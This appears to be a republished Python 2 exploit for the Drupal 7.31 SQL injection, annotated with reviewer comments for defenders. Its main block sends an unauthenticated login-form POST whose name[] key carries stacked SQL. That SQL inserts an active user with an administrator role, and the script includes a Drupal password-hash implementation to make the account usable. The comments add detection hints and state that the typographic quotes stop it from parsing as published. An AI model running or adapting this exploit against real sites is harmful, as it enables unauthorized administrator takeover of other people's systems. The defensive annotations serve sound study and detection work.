
Drupal 7.31 SQL Injection Exp

时间:2022-03-14 04:30

#-*- coding:utf-8 -*-
# NOTE(review): reconstructed layout. The published listing was flattened onto
# two physical lines and uses typographic quotes (‘) where Python expects ASCII
# quotes. The quote characters are kept exactly as published, so the file does
# not parse as-is. urllib2 and the print statements make this Python 2 code.
#
# Reading guide for defenders:
#   * DrupalHash re-implements the Drupal 7 salted, iterated password hash.
#   * The __main__ block sends one unauthenticated POST to the login block
#     form. SQL statements are carried inside the *key* of the name[] form
#     array, not in a value, so filters that only inspect parameter values
#     miss them.
#   * Effect of the embedded statements as written: one new row in `users`
#     (status=1) and one row in `users_roles` (rid=3) for the same uid.
import urllib2,sys
import hashlib

# Calculate a non-truncated Drupal 7 compatible password hash.
# The consumer of these hashes must truncate correctly.

class DrupalHash:
    """Compute a Drupal-compatible hash of `password` using the settings
    (type marker, iteration-count character, salt) taken from `stored_hash`.
    """

    def __init__(self, stored_hash, password):
        """Store the 64-character encoding alphabet and compute the hash once."""
        # Alphabet used both to decode the iteration-count character and to
        # encode the final digest.
        self.itoa64 = ‘./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz‘
        self.last_hash = self.rehash(stored_hash, password)

    def get_hash(self):
        """Return the value computed in __init__ (a string, or False when
        rehash() could not handle the stored hash format)."""
        return self.last_hash

    def password_get_count_log2(self, setting):
        """Return log2 of the iteration count: the position of the fourth
        character of `setting` within the alphabet. str.index raises
        ValueError when that character is not in the alphabet."""
        return self.itoa64.index(setting[3])

    def password_crypt(self, algo, password, setting):
        """Hash `password` with `algo` (‘md5‘ or ‘sha512‘) using the first 12
        characters of `setting`.

        Returns the 12-character setting followed by the encoded digest, or
        False when the setting is malformed, the salt is shorter than 8
        characters, or `algo` is not recognised.
        """
        # Only the first 12 characters matter: 3-character type marker,
        # 1 iteration-count character, 8-character salt.
        setting = setting[0:12]
        if setting[0] != ‘$‘ or setting[2] != ‘$‘:
            return False

        count_log2 = self.password_get_count_log2(setting)
        salt = setting[4:12]
        if len(salt) < 8:
            return False
        count = 1 << count_log2

        if algo == ‘md5‘:
            hash_func = hashlib.md5
        elif algo == ‘sha512‘:
            hash_func = hashlib.sha512
        else:
            return False
        # First round mixes in the salt; each later round feeds the previous
        # raw digest back in together with the password.
        hash_str = hash_func(salt + password).digest()
        for c in range(count):
            hash_str = hash_func(hash_str + password).digest()
        # The result is NOT truncated here; callers cut it to the stored
        # length themselves (the __main__ block uses the first 55 characters).
        output = setting + self.custom64(hash_str)
        return output

    def custom64(self, string, count = 0):
        """Encode the first `count` bytes of `string` with the 64-character
        alphabet; count == 0 means the whole string.

        Bytes are consumed in groups of up to three and emitted six bits at a
        time, lowest bits first. An empty `string` raises IndexError on the
        first ord() call because the loop body runs before any bound check.
        """
        if count == 0:
            count = len(string)
        output = ‘‘
        i = 0
        itoa64 = self.itoa64
        while 1:
            # Byte 1 of the group: bits 0-5 are emitted immediately.
            value = ord(string[i])
            i += 1
            output += itoa64[value & 0x3f]
            # Byte 2 (if present) is placed at bits 8-15.
            if i < count:
                value |= ord(string[i]) << 8
            output += itoa64[(value >> 6) & 0x3f]
            if i >= count:
                break
            i += 1
            # Byte 3 (if present) is placed at bits 16-23.
            if i < count:
                value |= ord(string[i]) << 16
            output += itoa64[(value >> 12) & 0x3f]
            if i >= count:
                break
            i += 1
            output += itoa64[(value >> 18) & 0x3f]
            if i >= count:
                break
        return output

    def rehash(self, stored_hash, password):
        """Select the hashing scheme from the shape of `stored_hash` and hash
        `password` with it. Returns False for an unrecognised type marker."""
        # Drupal 6 compatibility
        # A 32-character value without ‘$‘ is treated as an unsalted MD5 hex digest.
        if len(stored_hash) == 32 and stored_hash.find(‘$‘) == -1:
            return hashlib.md5(password).hexdigest()
        # Drupal 7
        # A leading ‘U‘ is stripped and the password is replaced by its MD5 hex
        # digest before the salted hash is applied on top.
        if stored_hash[0:2] == ‘U$‘:
            stored_hash = stored_hash[1:]
            password = hashlib.md5(password).hexdigest()
        hash_type = stored_hash[0:3]
        if hash_type == ‘$S$‘:
            hash_str = self.password_crypt(‘sha512‘, password, stored_hash)
        elif hash_type == ‘$H$‘ or hash_type == ‘$P$‘:
            hash_str = self.password_crypt(‘md5‘, password, stored_hash)
        else:
            hash_str = False
        return hash_str

if __name__ == "__main__":
    # Expects exactly three arguments: base URL, account name, password.
    if len(sys.argv) != 4:
        print ""
        print "python 7.31.py  http://www.secpulse.com/drupal adminasd 1234567"
        print ""
        sys.exit(1)
    host = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    # The hard-coded hash is only a settings template: password_crypt() reads
    # its first 12 characters (type marker, count character, salt). Every hash
    # this script produces therefore begins with the same 12 characters,
    # `$S$CTo9G7Lx2`, which makes that prefix in a `users.pass` column an
    # indicator that an account was created by this exact listing.
    hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
    target = ‘%s/?q=node&destination=node‘ % host

    # POST body for the login block form (form_id=user_login_block). The key of
    # the first name[...] entry carries stacked SQL statements:
    #   1. set @a to MAX(uid)+1 from `users`;
    #   2. insert a `users` row with uid=@a, status=1, the supplied name and
    #      the first 55 characters of the computed hash;
    #   3. insert a `users_roles` row with uid=@a and rid=3.
    # NOTE(review): rid 3 is presumably the administrator role and status=1 an
    # active account on a default install — confirm against the site's `role`
    # table. `user` is concatenated without any encoding.
    #
    # Detection: the request is a POST, so the statements are normally absent
    # from access logs; request-body logging or a WAF rule is needed. Look for
    # form keys starting with `name[` that contain anything other than a plain
    # index (encoded spaces, `;`, SQL keywords). urllib2 sends its default
    # Python-urllib User-Agent unless changed, which is only a weak signal.
    # Response/PHP-log marker: the warning text checked below.
    # After the fact: audit `users` and `users_roles` for rows nobody created
    # through the UI; updating Drupal core to a release newer than 7.31 that
    # contains the fix does not remove accounts that already exist.
    insert_user = "name[0%20;set+@a%3d%28SELECT+MAX%28uid%29+FROM+users%29%2b1;INSERT+INTO+users+set+uid%3d@a,status%3d1,name%3d\‘" \
                +user \
                +"‘+,+pass+%3d+‘" \
                +hash[:55] \
                +"‘;INSERT+INTO+users_roles+set+uid%3d@a,rid%3d3;;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"

    content = urllib2.urlopen(url=target, data=insert_user).read()
    # The script treats a PHP mb_strlen() warning in the returned page as proof
    # that the request reached the vulnerable code path.
    # NOTE(review): presumably raised because `name` arrives as an array rather
    # than a string; it only appears when PHP warnings are displayed, so its
    # absence in a response does not show that a site is patched.
    if "mb_strlen() expects parameter 1" in content:
        print "Success!\nLogin now with user:%s and pass:%s" % (user, password)
    else:
        print "Failed ,Somethings is wrong!"


